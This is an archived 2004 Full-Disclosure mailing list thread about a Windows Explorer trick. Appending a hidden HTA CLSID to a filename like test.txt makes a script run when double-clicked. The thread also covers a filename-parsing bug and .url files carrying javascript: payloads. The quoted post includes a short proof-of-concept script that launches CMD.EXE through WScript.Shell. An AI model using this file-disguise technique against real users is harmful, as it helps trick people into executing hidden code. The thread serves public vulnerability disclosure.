| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: StuartF at datacom.co.nz (Stuart Fox (DSL AK))
Subject: Microsoft hides certain types of files from your eyes + some filename parsing bug
The CLSID one doesn't work at all under XP SP2 Beta RC2. The CLSID is
registered on my machine as an HTA. File extension is show regardless
of whether you have view file extensions turned on or off.
Cheers
Stu
________________________________
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Good One
Sent: Thursday, 8 July 2004 11:37 a.m.
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Microsoft hides certain types of
files from your eyes + some filename parsing bug
Microsoft HIDES certain types of files from your eyes:
This one is old unpatched "behaviour" ...
If you will create in windows explorer file :
test.txt
with content :
<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CMD.EXE");
alert("Hello, I'm Silly Billy !");
</script>
It will be executed if you will add CLSID to it's name and user
double clicks it :
test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
Note:
CLSID will remain hidden (explorer will not show it up in any
means)
File name for user will remain : test.txt
This adds numerous possibilities for viruses to fool end user
into safe content.
another filename parsing bug (system even cannot access it) :
By some technics windows still allows to write file on harddisk
with funny name like :
test [good one :] .avi
End user will expierence certain difficulties to remove it
afterwards from system.
It's name will change to "test [good one", it will have no
extension, will show up 0 bytes etc, etc...
Of course .url and .lnk are hidden as well, being "shortcuts" in
m$ way. The contents of those files are up to you ... :-)
For example : file "test.url" with this content will open your
browser with alert.
[DEFAULT]
BASEURL=javascript:alert('hello mama !')
[InternetShortcut]
URL=javascript:alert('hello mama !')
Modified=00027F010505010100
m$ is good for gaming, not for serious work..
- SomeMan.
________________________________
ALL-NEW Yahoo! Messenger
<http://uk.rd.yahoo.com/evt=21626/*http://uk.messenger.yahoo.com> -
sooooo many all-new ways to express yourself
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040708/8c9813e4/attachment.html
Powered by blists - more mailing lists